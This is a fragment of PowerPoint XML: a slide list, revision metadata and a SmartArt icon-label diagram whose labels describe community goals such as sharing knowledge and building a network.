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5" r:id="rId3"/>
    <p:sldMasterId id="2147483700" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId71"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId72"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="2076137557" r:id="rId5"/>
    <p:sldId id="2076137548" r:id="rId6"/>
    <p:sldId id="2076137549" r:id="rId7"/>
    <p:sldId id="2076137550" r:id="rId8"/>
    <p:sldId id="2076137551" r:id="rId9"/>
    <p:sldId id="2076137552" r:id="rId10"/>
    <p:sldId id="2076137553" r:id="rId11"/>
    <p:sldId id="2076137556" r:id="rId12"/>
    <p:sldId id="2076137554" r:id="rId13"/>
    <p:sldId id="2076137555" r:id="rId14"/>
    <p:sldId id="256" r:id="rId15"/>
    <p:sldId id="257" r:id="rId16"/>
    <p:sldId id="263" r:id="rId17"/>
    <p:sldId id="282" r:id="rId18"/>
    <p:sldId id="289" r:id="rId19"/>
    <p:sldId id="291" r:id="rId20"/>
    <p:sldId id="292" r:id="rId21"/>
    <p:sldId id="283" r:id="rId22"/>
    <p:sldId id="259" r:id="rId23"/>
    <p:sldId id="281" r:id="rId24"/>
    <p:sldId id="296" r:id="rId25"/>
    <p:sldId id="284" r:id="rId26"/>
    <p:sldId id="260" r:id="rId27"/>
    <p:sldId id="262" r:id="rId28"/>
    <p:sldId id="267" r:id="rId29"/>
    <p:sldId id="268" r:id="rId30"/>
    <p:sldId id="270" r:id="rId31"/>
    <p:sldId id="287" r:id="rId32"/>
    <p:sldId id="285" r:id="rId33"/>
    <p:sldId id="279" r:id="rId34"/>
    <p:sldId id="280" r:id="rId35"/>
    <p:sldId id="274" r:id="rId36"/>
    <p:sldId id="293" r:id="rId37"/>
    <p:sldId id="294" r:id="rId38"/>
    <p:sldId id="295" r:id="rId39"/>
    <p:sldId id="2076137547" r:id="rId40"/>
    <p:sldId id="2076137546" r:id="rId41"/>
    <p:sldId id="258" r:id="rId42"/>
    <p:sldId id="2076137544" r:id="rId43"/>
    <p:sldId id="1713476401" r:id="rId44"/>
    <p:sldId id="2076137519" r:id="rId45"/>
    <p:sldId id="1713476402" r:id="rId46"/>
    <p:sldId id="2076137517" r:id="rId47"/>
    <p:sldId id="2076137520" r:id="rId48"/>
    <p:sldId id="2076137542" r:id="rId49"/>
    <p:sldId id="2076137521" r:id="rId50"/>
    <p:sldId id="2076137523" r:id="rId51"/>
    <p:sldId id="2076137543" r:id="rId52"/>
    <p:sldId id="2076137545" r:id="rId53"/>
    <p:sldId id="2076137499" r:id="rId54"/>
    <p:sldId id="2076137514" r:id="rId55"/>
    <p:sldId id="2076137526" r:id="rId56"/>
    <p:sldId id="1713476346" r:id="rId57"/>
    <p:sldId id="2076137532" r:id="rId58"/>
    <p:sldId id="2076137535" r:id="rId59"/>
    <p:sldId id="2076137540" r:id="rId60"/>
    <p:sldId id="2076137524" r:id="rId61"/>
    <p:sldId id="2076137525" r:id="rId62"/>
    <p:sldId id="2076137537" r:id="rId63"/>
    <p:sldId id="2076137530" r:id="rId64"/>
    <p:sldId id="2076137528" r:id="rId65"/>
    <p:sldId id="2076137515" r:id="rId66"/>
    <p:sldId id="2076137522" r:id="rId67"/>
    <p:sldId id="2076137531" r:id="rId68"/>
    <p:sldId id="2076137534" r:id="rId69"/>
    <p:sldId id="265"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A5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22C348-9A4E-4C73-82E8-3BCB8056D77A}" v="9202" dt="2022-04-20T12:37:51.055"/>
    <p1510:client id="{CC43586F-7C21-414E-ADD0-6C07FD4DEDE8}" v="1958" dt="2022-04-20T11:48:26.151"/>
    <p1510:client id="{CE19D62B-D55B-6AF6-5E0E-467DD637DE0C}" v="59" dt="2022-04-19T13:05:26.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884" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="125" d="100"/>
          <a:sy n="125" d="100"/>
        </p:scale>
        <p:origin x="1536" y="10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5.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33BE21-EF2B-4956-9FF2-C73DDB0FF77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2B5EC6E-7A24-45C9-A6A6-16307279389E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>Have fun​</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{061C51FF-3B5D-47C7-9564-1F516FB338C3}" type="parTrans" cxnId="{8A19AD19-5860-4234-81FF-4634F25EAC13}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7B1088A2-7101-4E80-889E-AA48A0B45326}" type="sibTrans" cxnId="{8A19AD19-5860-4234-81FF-4634F25EAC13}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF72C9DF-F868-4DFE-982B-5BFB283088A7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>Build network ​</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB38A99F-52C0-479A-8B1C-1A3F39FA1796}" type="parTrans" cxnId="{79923D87-D27C-4B7A-884E-BB55E1A02974}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{922A5A2A-AB48-421C-B50E-EEF6CF2559EB}" type="sibTrans" cxnId="{79923D87-D27C-4B7A-884E-BB55E1A02974}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CB8076B-81B3-4764-86E4-681D244C6286}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>Share knowledge ​</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25C35FA1-ABA5-4F56-87A8-5DF5AC8AB0E1}" type="parTrans" cxnId="{5804ABD3-AF52-488C-833D-40FD598FA735}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36F0A46A-F8CF-450F-A617-D44E353328D5}" type="sibTrans" cxnId="{5804ABD3-AF52-488C-833D-40FD598FA735}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{005F30B4-B72D-4166-88CE-626C19AC5BF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>Learn from each other ​</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4049BA7F-85DF-44D1-9277-38CC2B9F697D}" type="parTrans" cxnId="{36864721-2C20-49FC-8773-A15ED4A034A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{75BD2EA1-3563-45AF-AD9C-DC7C6CCC1FE9}" type="sibTrans" cxnId="{36864721-2C20-49FC-8773-A15ED4A034A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3EFB4BBB-6A0A-4C16-829E-6C5B9EFEB16A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>Giving power to the community​</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26D361AA-C2B7-4C1E-8A3F-AB4B62BE0EAA}" type="parTrans" cxnId="{3CE57C5E-3B9E-4C77-B210-A1682C819D64}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35F04467-BE5E-4655-91D4-C4C01852B9B5}" type="sibTrans" cxnId="{3CE57C5E-3B9E-4C77-B210-A1682C819D64}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF7E69CC-7070-439C-8E88-2289E3DF1C3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>Develop technology for a secure and sustainable future​</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FB7B418-8494-4A8C-A06E-D13081174B64}" type="parTrans" cxnId="{FF6FB019-F482-47D9-A4B4-ABA81C6008ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB00602A-6B30-4465-9872-9A038195069C}" type="sibTrans" cxnId="{FF6FB019-F482-47D9-A4B4-ABA81C6008ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A12005A4-2BEF-4526-A5F1-438D6AE3ED54}" type="pres">
      <dgm:prSet presAssocID="{8E33BE21-EF2B-4956-9FF2-C73DDB0FF77A}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E1AC0C92-88B9-483B-96F8-6D91242DC2C2}" type="pres">
      <dgm:prSet presAssocID="{B2B5EC6E-7A24-45C9-A6A6-16307279389E}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F267BC44-3D0E-4EF3-9B68-6AE2FFA89EF0}" type="pres">
      <dgm:prSet presAssocID="{B2B5EC6E-7A24-45C9-A6A6-16307279389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nce"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{50115117-7D1B-4AE8-A50A-E8E15187A110}" type="pres">
      <dgm:prSet presAssocID="{B2B5EC6E-7A24-45C9-A6A6-16307279389E}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6868F6AE-444B-4C99-A6AC-BD5E4CCC91F5}" type="pres">
      <dgm:prSet presAssocID="{B2B5EC6E-7A24-45C9-A6A6-16307279389E}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CD2FBB17-0FB3-4C0F-8DA2-95F4AFB75251}" type="pres">
      <dgm:prSet presAssocID="{7B1088A2-7101-4E80-889E-AA48A0B45326}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F7EC7F27-2EF0-43ED-95A5-DAD22CF74946}" type="pres">
      <dgm:prSet presAssocID="{CF72C9DF-F868-4DFE-982B-5BFB283088A7}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2C72DE5B-4B80-4499-BCEF-AA16287C1D3E}" type="pres">
      <dgm:prSet presAssocID="{CF72C9DF-F868-4DFE-982B-5BFB283088A7}"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1E6EA5BE-7FCE-4B49-BC3A-01DE887DEFFB}" type="pres">
      <dgm:prSet presAssocID="{CF72C9DF-F868-4DFE-982B-5BFB283088A7}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F72F1E8C-98C7-42C9-9999-D68C7DD0D620}" type="pres">
      <dgm:prSet presAssocID="{CF72C9DF-F868-4DFE-982B-5BFB283088A7}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B8E359F6-6C3A-467F-A152-90B7F2ABAC91}" type="pres">
      <dgm:prSet presAssocID="{922A5A2A-AB48-421C-B50E-EEF6CF2559EB}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{98FDF43E-0D24-4B12-B8E2-3855C0BE5DCE}" type="pres">
      <dgm:prSet presAssocID="{3CB8076B-81B3-4764-86E4-681D244C6286}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99290F20-EA8F-4983-A5DD-E67CBFBCB590}" type="pres">
      <dgm:prSet presAssocID="{3CB8076B-81B3-4764-86E4-681D244C6286}"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82FAE5F2-D52D-445C-AE57-BD5886F3BF7E}" type="pres">
      <dgm:prSet presAssocID="{3CB8076B-81B3-4764-86E4-681D244C6286}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A49BE54C-C489-41FC-B0D2-C3BAD0486691}" type="pres">
      <dgm:prSet presAssocID="{3CB8076B-81B3-4764-86E4-681D244C6286}" presName="textRect" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C69BC969-0A7D-4B2F-8B1F-22786BCD1EB7}" type="pres">
      <dgm:prSet presAssocID="{36F0A46A-F8CF-450F-A617-D44E353328D5}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9E80F26D-3E6B-4803-AD04-793A453C1521}" type="pres">
      <dgm:prSet presAssocID="{005F30B4-B72D-4166-88CE-626C19AC5BF9}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EE8780AC-C293-492D-84D0-AA9CFCFEF2C9}" type="pres">
      <dgm:prSet presAssocID="{005F30B4-B72D-4166-88CE-626C19AC5BF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oks"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{03CA19A4-A984-4673-8ECC-E91DC9E1F76E}" type="pres">
      <dgm:prSet presAssocID="{005F30B4-B72D-4166-88CE-626C19AC5BF9}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2705D3C6-3FC7-415F-AE9E-3468C1D004A0}" type="pres">
      <dgm:prSet presAssocID="{005F30B4-B72D-4166-88CE-626C19AC5BF9}" presName="textRect" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{35D13C53-3DF1-45D5-A1A9-636CF0635780}" type="pres">
      <dgm:prSet presAssocID="{75BD2EA1-3563-45AF-AD9C-DC7C6CCC1FE9}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D7301A0E-99ED-4B08-A75D-A9069BA587B3}" type="pres">
      <dgm:prSet presAssocID="{3EFB4BBB-6A0A-4C16-829E-6C5B9EFEB16A}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8864A423-11A1-440E-8C4C-F8F5BB8D2D20}" type="pres">
      <dgm:prSet presAssocID="{3EFB4BBB-6A0A-4C16-829E-6C5B9EFEB16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roup"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{54184ACA-E0B1-4766-AA81-319C7E9C789D}" type="pres">
      <dgm:prSet presAssocID="{3EFB4BBB-6A0A-4C16-829E-6C5B9EFEB16A}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{916E310B-96CC-4261-8A04-C0E6AE5FC396}" type="pres">
      <dgm:prSet presAssocID="{3EFB4BBB-6A0A-4C16-829E-6C5B9EFEB16A}" presName="textRect" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{925C84EB-5B14-4DD5-AF1E-76193FB0388B}" type="pres">
      <dgm:prSet presAssocID="{35F04467-BE5E-4655-91D4-C4C01852B9B5}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EFC787B1-D02D-4923-BA55-61A5558A401F}" type="pres">
      <dgm:prSet presAssocID="{DF7E69CC-7070-439C-8E88-2289E3DF1C3A}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{38F1A9C0-BA9B-4CB9-AEB9-6ED2315FB3D9}" type="pres">
      <dgm:prSet presAssocID="{DF7E69CC-7070-439C-8E88-2289E3DF1C3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Lock"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{FF49C45B-A01A-4286-AA5A-9AF6CB394297}" type="pres">
      <dgm:prSet presAssocID="{DF7E69CC-7070-439C-8E88-2289E3DF1C3A}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4D622E96-7547-4DCB-8B8D-76186CD73A67}" type="pres">
      <dgm:prSet presAssocID="{DF7E69CC-7070-439C-8E88-2289E3DF1C3A}" presName="textRect" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8A19AD19-5860-4234-81FF-4634F25EAC13}" srcId="{8E33BE21-EF2B-4956-9FF2-C73DDB0FF77A}" destId="{B2B5EC6E-7A24-45C9-A6A6-16307279389E}" srcOrd="0" destOrd="0" parTransId="{061C51FF-3B5D-47C7-9564-1F516FB338C3}" sibTransId="{7B1088A2-7101-4E80-889E-AA48A0B45326}"/>
    <dgm:cxn modelId="{FF6FB019-F482-47D9-A4B4-ABA81C6008ED}" srcId="{8E33BE21-EF2B-4956-9FF2-C73DDB0FF77A}" destId="{DF7E69CC-7070-439C-8E88-2289E3DF1C3A}" srcOrd="5" destOrd="0" parTransId="{0FB7B418-8494-4A8C-A06E-D13081174B64}" sibTransId="{BB00602A-6B30-4465-9872-9A038195069C}"/>
    <dgm:cxn modelId="{36864721-2C20-49FC-8773-A15ED4A034A0}" srcId="{8E33BE21-EF2B-4956-9FF2-C73DDB0FF77A}" destId="{005F30B4-B72D-4166-88CE-626C19AC5BF9}" srcOrd="3" destOrd="0" parTransId="{4049BA7F-85DF-44D1-9277-38CC2B9F697D}" sibTransId="{75BD2EA1-3563-45AF-AD9C-DC7C6CCC1FE9}"/>
    <dgm:cxn modelId="{3FE59631-1B7E-40F2-9A47-C43D8D6578C2}" type="presOf" srcId="{3CB8076B-81B3-4764-86E4-681D244C6286}" destId="{A49BE54C-C489-41FC-B0D2-C3BAD0486691}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{588BAA33-10E9-431B-96BC-FFDE4036EE67}" type="presOf" srcId="{8E33BE21-EF2B-4956-9FF2-C73DDB0FF77A}" destId="{A12005A4-2BEF-4526-A5F1-438D6AE3ED54}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{3CE57C5E-3B9E-4C77-B210-A1682C819D64}" srcId="{8E33BE21-EF2B-4956-9FF2-C73DDB0FF77A}" destId="{3EFB4BBB-6A0A-4C16-829E-6C5B9EFEB16A}" srcOrd="4" destOrd="0" parTransId="{26D361AA-C2B7-4C1E-8A3F-AB4B62BE0EAA}" sibTransId="{35F04467-BE5E-4655-91D4-C4C01852B9B5}"/>
    <dgm:cxn modelId="{8BEA9779-A713-4D51-82CD-25D0C8FAA99D}" type="presOf" srcId="{B2B5EC6E-7A24-45C9-A6A6-16307279389E}" destId="{6868F6AE-444B-4C99-A6AC-BD5E4CCC91F5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{79923D87-D27C-4B7A-884E-BB55E1A02974}" srcId="{8E33BE21-EF2B-4956-9FF2-C73DDB0FF77A}" destId="{CF72C9DF-F868-4DFE-982B-5BFB283088A7}" srcOrd="1" destOrd="0" parTransId="{BB38A99F-52C0-479A-8B1C-1A3F39FA1796}" sibTransId="{922A5A2A-AB48-421C-B50E-EEF6CF2559EB}"/>
    <dgm:cxn modelId="{4065848A-665D-4E9D-A7A4-EBFE27C4B845}" type="presOf" srcId="{005F30B4-B72D-4166-88CE-626C19AC5BF9}" destId="{2705D3C6-3FC7-415F-AE9E-3468C1D004A0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{3DDAF6BD-99F2-4427-8804-DDE24931A44C}" type="presOf" srcId="{3EFB4BBB-6A0A-4C16-829E-6C5B9EFEB16A}" destId="{916E310B-96CC-4261-8A04-C0E6AE5FC396}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{5804ABD3-AF52-488C-833D-40FD598FA735}" srcId="{8E33BE21-EF2B-4956-9FF2-C73DDB0FF77A}" destId="{3CB8076B-81B3-4764-86E4-681D244C6286}" srcOrd="2" destOrd="0" parTransId="{25C35FA1-ABA5-4F56-87A8-5DF5AC8AB0E1}" sibTransId="{36F0A46A-F8CF-450F-A617-D44E353328D5}"/>
    <dgm:cxn modelId="{592B19D8-09D2-41E0-AD24-A1BD1874461D}" type="presOf" srcId="{DF7E69CC-7070-439C-8E88-2289E3DF1C3A}" destId="{4D622E96-7547-4DCB-8B8D-76186CD73A67}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{E4ADAFE7-257B-4646-8C90-FF81BE62AC89}" type="presOf" srcId="{CF72C9DF-F868-4DFE-982B-5BFB283088A7}" destId="{F72F1E8C-98C7-42C9-9999-D68C7DD0D620}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{34513AC8-29BF-4BC0-98BE-A1BF7CA041CF}" type="presParOf" srcId="{A12005A4-2BEF-4526-A5F1-438D6AE3ED54}" destId="{E1AC0C92-88B9-483B-96F8-6D91242DC2C2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{5A1DE404-64D8-4878-ABEE-22190C5D1526}" type="presParOf" srcId="{E1AC0C92-88B9-483B-96F8-6D91242DC2C2}" destId="{F267BC44-3D0E-4EF3-9B68-6AE2FFA89EF0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{EF26C601-AB9D-4293-9AB5-ABF1530BCC3F}" type="presParOf" srcId="{E1AC0C92-88B9-483B-96F8-6D91242DC2C2}" destId="{50115117-7D1B-4AE8-A50A-E8E15187A110}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{F3052A78-F201-417B-822E-792F33940076}" type="presParOf" srcId="{E1AC0C92-88B9-483B-96F8-6D91242DC2C2}" destId="{6868F6AE-444B-4C99-A6AC-BD5E4CCC91F5}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{28725695-AF6E-4305-8FCD-0A99527A39CA}" type="presParOf" srcId="{A12005A4-2BEF-4526-A5F1-438D6AE3ED54}" destId="{CD2FBB17-0FB3-4C0F-8DA2-95F4AFB75251}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{3828DF92-36FF-4DE4-B3D0-18EB48CE288B}" type="presParOf" srcId="{A12005A4-2BEF-4526-A5F1-438D6AE3ED54}" destId="{F7EC7F27-2EF0-43ED-95A5-DAD22CF74946}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{BF1B837D-879E-43E2-B03F-6FA6B2BDD861}" type="presParOf" srcId="{F7EC7F27-2EF0-43ED-95A5-DAD22CF74946}" destId="{2C72DE5B-4B80-4499-BCEF-AA16287C1D3E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{D82B43E3-B14F-4851-9CF0-292AEC482BC5}" type="presParOf" srcId="{F7EC7F27-2EF0-43ED-95A5-DAD22CF74946}" destId="{1E6EA5BE-7FCE-4B49-BC3A-01DE887DEFFB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{FBD66B06-3B0D-46DE-9399-A4F7453C4C97}" type="presParOf" srcId="{F7EC7F27-2EF0-43ED-95A5-DAD22CF74946}" destId="{F72F1E8C-98C7-42C9-9999-D68C7DD0D620}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{04DC636D-8123-4FAA-BF1B-E782E4AF922D}" type="presParOf" srcId="{A12005A4-2BEF-4526-A5F1-438D6AE3ED54}" destId="{B8E359F6-6C3A-467F-A152-90B7F2ABAC91}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{E3C18271-EE2C-4177-9A60-E5BAC15A9E0B}" type="presParOf" srcId="{A12005A4-2BEF-4526-A5F1-438D6AE3ED54}" destId="{98FDF43E-0D24-4B12-B8E2-3855C0BE5DCE}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{F374BCB1-B636-447A-8E38-EC0FBF488795}" type="presParOf" srcId="{98FDF43E-0D24-4B12-B8E2-3855C0BE5DCE}" destId="{99290F20-EA8F-4983-A5DD-E67CBFBCB590}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{AEA20ECB-AA7F-4724-B4A9-7C16168996B6}" type="presParOf" srcId="{98FDF43E-0D24-4B12-B8E2-3855C0BE5DCE}" destId="{82FAE5F2-D52D-445C-AE57-BD5886F3BF7E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
